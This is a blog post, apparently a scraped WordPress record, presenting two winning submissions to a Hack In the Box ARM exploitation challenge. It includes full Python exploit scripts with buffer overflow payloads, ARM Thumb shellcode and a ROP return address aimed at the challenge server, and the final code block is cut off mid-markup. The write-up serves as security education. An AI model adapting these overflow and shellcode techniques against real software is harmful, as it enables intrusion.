{"id":12656,"date":"2018-06-22T14:19:06","date_gmt":"2018-06-22T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/06\/22\/news-6424\/"},"modified":"2018-06-22T14:19:06","modified_gmt":"2018-06-22T22:19:06","slug":"news-6424","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/06\/22\/news-6424\/","title":{"rendered":"beVX Conference Challenge \u2013 HiTB"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Fri, 22 Jun 2018 11:30:44 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p>During the event of Hack In the Box, we launched an ARM reverse engineering and exploitation challenge and gave the attendees the change to win great prizes.<\/p>\n<p>The challenge was divided into two parts, a file &#8211; can be downloaded from here: <a href=\"https:\/\/www.beyondsecurity.com\/bevxcon\/bevx-challenge-10\" rel=\"noopener\" target=\"_blank\">https:\/\/www.beyondsecurity.com\/bevxcon\/bevx-challenge-10<\/a> &#8211; that you had to download and reverse engineer and server that you had to access to have a running version of this file.<\/p>\n<p>The challenge consisted of a binary that is acting as a &#8216;server&#8217; which expects incoming connections to it, when an incoming connection occurs and a certain &#8216;protocol&#8217; is implemented and it will print out &#8216;All your base&#8217; and exit. 
The challenge was to write an exploit that will cause the program to print out &#8216;Belong to us!&#8217;.<\/p>\n<p>The intended way of solving this challenge was to preform an overflow and cause the execution path of the code to change, while one of the solutions provided did not follow this path &#8211; and was still able to change the output of the program.<\/p>\n<p>We received several submissions, only two were complete and solved the challenge completely, others were close but did not meet our minimum requirements and therefore are not presented here.<br \/> <strong>ebux25<\/strong><br \/> In this submission, the execution path is not overwritten rather the string displayed is changed such that the program does not crash while it still prints the required string. While this was not the intended idea of the challenge, there was no rule against this kind of solution.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b2d75d984422351953327\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div 
class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;  #  # Bevx challange submission 2 (https:\/\/www.beyondsecurity.com\/bevxcon\/bevx-challenge-10)  #  by Gergely Eberhardt (@ebux25)  #       #  # Usage:  #   bevx_exp.py &lt;server ip address&gt;  #  #&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;    import socket  import sys  import struct  import binascii    if (len(sys.argv) &lt; 2):      print &#8216;bevx_exp.py addr&#8217;    port = 2323  addr = sys.argv[1]    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((addr, port))  #message = &#8216;x12xffx2fxe1&#8217;+&#8217;Belong to us!&#8217;  message = &#8216;x12x1fx2fx11&#8217;+&#8217;Belong to us!&#8217;    # initialize buffer  #   8 bytes: id  #   message  #   dummy  data = &#8216;;*k%:Znx01&#8217;+message+&#8217; &#8216;*(0x78-len(message))  data += &#8216;x11x12xd8x00&#8217;+&#8217;x0cx00xdaxda&#8217;+&#8217;x15x12xd8x00x00x00x00&#8217;    print binascii.hexlify(data)  s.sendall(data)    
s.sendall(message)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0051 seconds] -->  <\/p>\n<p><strong>yohanes<\/strong><br \/> The solution provided by yohanes, was meeting more our expectations to what we were looking, it changes the execution code path.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b2d75d984430317233438\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div 
class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #Yohanes Nugroho  #Twitter\/github\/gmail: @yohanes\/@yohanes  import socket  import struct  import sys    if len(sys.argv)&lt;2:      print &#8220;usage: client.py &lt;host&gt; n&#8221;      print &#8220;will use port 2323n&#8221;      exit(0)    host = sys.argv[1]    ch2 = &#8220;3a5a6e01&#8221;.decode(&#8220;heX&#8221;)  ch1 = &#8220;3b2a6b25&#8221;.decode(&#8220;hex&#8221;)  r2 = &#8220;xc6x80x5ax17&#8221;   r3 = &#8220;xe1x80x80xcd&#8221;  ip =  &#8220;x80x74&#8221; #ROP TO id87480    # r2 ^ r3 will result in address 0xdada0027    payload_asm = &#8220;&#8221;&#8221;  #overwrite string  movs r0, r0   movs r0, r0  str r3, [r3]  movs r2, #8  strb r2, [r3] ; offset to string belong to us  ldr r3, [r3]  movs r2, #13  lsls r2, r2, #4  lsls r2, r2, #4  adds r2, #76  negs r2, r2  add r2, r2, r9  ldr r2, [r2]  ldr r2, [r2]  ldr r4, [r3]  str r4, [r2]  ldr r4, [r3, 4]  str r4, [r2, 4]  adds r3, r3, #8  adds r2, r2, #8  ldr r4, [r3]  str r4, [r2]  ldr r4, [r3, 4]  str r4, [r2, 4]  #return  movs r2, #14  lsls r2, r2, #4  lsls r2, r2, #4  adds r2, #53  negs r2, r2  add r2, r2, r9  bx r2  &#8220;&#8221;&#8221;    payload = &#8220;x00x00x00x00x1bx60x08x22x1ax70x1bx68x0dx22x12x01x12x01x4cx32x52x42x4ax44x12x68x12x68x1cx68x14x60x5cx68x54x60x08x33x08x32x1cx68x14x60x5cx68x54x60x0ex22x12x01x12x01x35x32x52x42x4ax44x10x47&#8221;      payload += &#8220;x00x68&#8221; # this will make it crash, used to check register values    n = 128 &#8211; 38 &#8211; len(payload)   #print &#8220;LEFT &#8220;, n # how much shell code space left    tous = &#8220;Belong to us!x00&#8221;  padding1 = &#8220;B&#8221; * (30 &#8211; len (tous))    padding2 = &#8220;A&#8221; * n  pl = ch1+ch2+tous + padding1+ payload + padding2 +r2 + r3 + ip     #this will 
make sure we can encode\/decode the string as UTF-8  print &#8220;IS OK &#8220;, pl.decode(&#8220;utf-8&#8221;).encode(&#8220;utf-8&#8221;)==pl  print &#8220;Sending payload n&#8221;, pl    s = socket.create_connection((host, 2323))  s.sendall(pl)    s.recv(1)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5b2d75d984430317233438-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-36\">36<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5b2d75d984430317233438-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5b2d75d984430317233438-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-78\">78<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5b2d75d984430317233438-79\">79<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-1\"><span class=\"crayon-c\">#Yohanes Nugroho<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-2\"><span class=\"crayon-c\">#Twitter\/github\/gmail: @yohanes\/@yohanes<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-3\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">socket<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-4\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">struct<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-5\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-7\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;usage: client.py &lt;host&gt; 
n&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;will use port 2323n&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-12\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-14\"><span class=\"crayon-v\">ch2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;3a5a6e01&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;heX&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-15\"><span class=\"crayon-v\">ch1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;3b2a6b25&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-e\">decode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;hex&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-16\"><span class=\"crayon-v\">r2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;xc6x80x5ax17&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-17\"><span class=\"crayon-v\">r3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;xe1x80x80xcd&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-18\"><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;x80x74&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#ROP TO id87480<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-20\"><span class=\"crayon-c\"># r2 ^ r3 will result in address 0xdada0027<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-22\"><span class=\"crayon-v\">payload_asm<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-23\"><span class=\"crayon-s\">#overwrite string<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-24\"><span 
class=\"crayon-s\">movs r0, r0 <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-25\"><span class=\"crayon-s\">movs r0, r0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-26\"><span class=\"crayon-s\">str r3, [r3]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-27\"><span class=\"crayon-s\">movs r2, #8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-28\"><span class=\"crayon-s\">strb r2, [r3] ; offset to string belong to us<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-29\"><span class=\"crayon-s\">ldr r3, [r3]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-30\"><span class=\"crayon-s\">movs r2, #13<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-31\"><span class=\"crayon-s\">lsls r2, r2, #4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-32\"><span class=\"crayon-s\">lsls r2, r2, #4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-33\"><span class=\"crayon-s\">adds r2, #76<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-34\"><span class=\"crayon-s\">negs r2, r2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-35\"><span class=\"crayon-s\">add r2, r2, r9<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-36\"><span class=\"crayon-s\">ldr r2, [r2]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-37\"><span class=\"crayon-s\">ldr r2, [r2]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-38\"><span class=\"crayon-s\">ldr r4, [r3]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-39\"><span 
class=\"crayon-s\">str r4, [r2]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-40\"><span class=\"crayon-s\">ldr r4, [r3, 4]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-41\"><span class=\"crayon-s\">str r4, [r2, 4]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-42\"><span class=\"crayon-s\">adds r3, r3, #8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-43\"><span class=\"crayon-s\">adds r2, r2, #8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-44\"><span class=\"crayon-s\">ldr r4, [r3]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-45\"><span class=\"crayon-s\">str r4, [r2]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-46\"><span class=\"crayon-s\">ldr r4, [r3, 4]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-47\"><span class=\"crayon-s\">str r4, [r2, 4]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-48\"><span class=\"crayon-s\">#return<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-49\"><span class=\"crayon-s\">movs r2, #14<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-50\"><span class=\"crayon-s\">lsls r2, r2, #4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-51\"><span class=\"crayon-s\">lsls r2, r2, #4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-52\"><span class=\"crayon-s\">adds r2, #53<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-53\"><span class=\"crayon-s\">negs r2, r2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-54\"><span 
class=\"crayon-s\">add r2, r2, r9<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-55\"><span class=\"crayon-s\">bx r2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-56\"><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-57\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-58\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00x00x00x00x1bx60x08x22x1ax70x1bx68x0dx22x12x01x12x01x4cx32x52x42x4ax44x12x68x12x68x1cx68x14x60x5cx68x54x60x08x33x08x32x1cx68x14x60x5cx68x54x60x0ex22x12x01x12x01x35x32x52x42x4ax44x10x47&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-59\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-60\">&nbsp;<\/div>\n<div 